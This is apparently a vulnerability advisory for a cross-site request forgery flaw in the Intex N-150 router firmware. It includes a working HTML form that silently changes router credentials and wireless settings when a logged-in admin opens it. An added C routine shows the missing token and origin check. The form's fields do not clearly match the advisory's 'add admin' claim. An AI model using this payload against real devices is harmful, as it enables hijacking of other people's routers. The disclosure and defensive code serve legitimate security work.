# Exploit Title: Intex Router N-150 - Cross-Site Request Forgery (Add Admin)
# Date: 2018-06-23
# Exploit Author: Navina Asrani
# Version: N-150
# CVE : N/A
# Category: Router Firmware
# 1. Description
# The firmware executes requests without verifying their source. A malicious
# request is therefore carried out as if the logged-in admin had sent it,
# which leads to the creation of a privileged user.
# 2. Proof of Concept
# Visit the application
# Go to any router setting modification page and change the values,
# create a request and observe the lack of CSRF tokens.
# Craft an HTML page with all the details for the built-in admin
# user creation and host it on a server
# Upon the link being clicked by a logged-in admin user,
# the action is executed immediately
# Exploitation Technique: An attacker can create a rogue admin user to gain
# access to the application.
# Exploit code:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.0.1/goform/WizardHandle" method="POST">
<input type="hidden" name="GO" value="index.asp" />
<input type="hidden" name="v12_time" value="1529768448.425" />
<input type="hidden" name="WANT1" value="3" />
<input type="hidden" name="isp" value="3" />
<input type="hidden" name="PUN" value="testuser_k" />
<input type="hidden" name="PPW" value="123456" />
<input type="hidden" name="SSID" value="testwifiap" />
<input type="hidden" name="wirelesspassword" value="00000000" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
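# Added example (not part of the original advisory and not the vendor's code):
# the server-side check whose absence the description reports, as a form handler
# could apply it before any state-changing POST. The function names and the
# hidden field name "csrf_token" are assumptions; all sample values are constructed.

```c
#include <stddef.h>
#include <string.h>

/* 1 if url (Origin or Referer value) is http(s) and its authority equals
 * host exactly. Assumes both are lowercase, as browsers send them. */
static int url_authority_matches(const char *url, const char *host)
{
    const char *p;
    size_t hlen = strlen(host);
    if (strncmp(url, "http://", 7) == 0)       p = url + 7;
    else if (strncmp(url, "https://", 8) == 0) p = url + 8;
    else return 0;                      /* "null", file:, data:, ... */
    if (hlen == 0 || strncmp(p, host, hlen) != 0)
        return 0;
    /* Authority must end here: rejects "192.168.0.1.attacker.example". */
    return p[hlen] == '\0' || p[hlen] == '/';
}

/* Compare tokens without an early exit on the first differing byte. */
static int token_equal(const char *a, const char *b)
{
    size_t la = strlen(a), lb = strlen(b), i;
    unsigned char diff = (unsigned char)(la != lb);
    for (i = 0; i < la && i < lb; i++)
        diff |= (unsigned char)(a[i] ^ b[i]);
    return la != 0 && diff == 0;
}

/* Gate for a state-changing POST. NULL means the header or field is absent.
 * host: Host header; session_token: per-session secret kept by the server;
 * form_token: value of a hidden form field (hypothetical name "csrf_token"). */
int csrf_check(const char *host, const char *origin, const char *referer,
               const char *session_token, const char *form_token)
{
    const char *src = origin ? origin : referer;
    if (!host || !src || !url_authority_matches(src, host))
        return 0;                       /* cross-site or unknown source */
    if (!session_token || !form_token)
        return 0;                       /* form carried no token */
    return token_equal(session_token, form_token);
}

int main(void)
{
    /* Constructed sample: same-origin POST with the right token passes. */
    return csrf_check("192.168.0.1", "http://192.168.0.1", NULL,
                      "k3f9a1", "k3f9a1") ? 0 : 1;
}
```

# A form with no token field, like the one shown above, fails this check even
# when it is submitted from the router's own pages.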